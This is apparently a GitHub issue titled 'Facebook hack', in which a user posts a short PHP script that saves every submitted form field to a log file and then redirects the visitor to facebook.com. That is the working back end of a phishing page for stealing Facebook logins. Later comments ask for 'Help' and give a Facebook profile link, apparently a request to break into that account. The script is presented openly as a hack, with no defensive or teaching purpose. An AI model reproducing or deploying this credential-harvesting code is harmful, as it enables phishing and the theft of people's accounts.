alvirefat2003 / dodbaba

0 stars 1 forks source link

Facebook hack #1

Open alvirefat2003 opened 9 months ago

alvirefat2003 commented 9 months ago

facebokk

<?php // Set the location to redirect the page header ('Location: http://www.facebook.com'); // Open the text file in writing mode $file = fopen("log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($file, $variable); fwrite($file, "="); fwrite($file, $value); fwrite($file, "\r\n"); } fwrite($file, "\r\n"); fclose($file); exit; ?>

Marrr17 commented 9 months ago

Help

Marrr17 commented 9 months ago

https://www.facebook.com/profile.php?id=100085212249250&mibextid=tzlV2A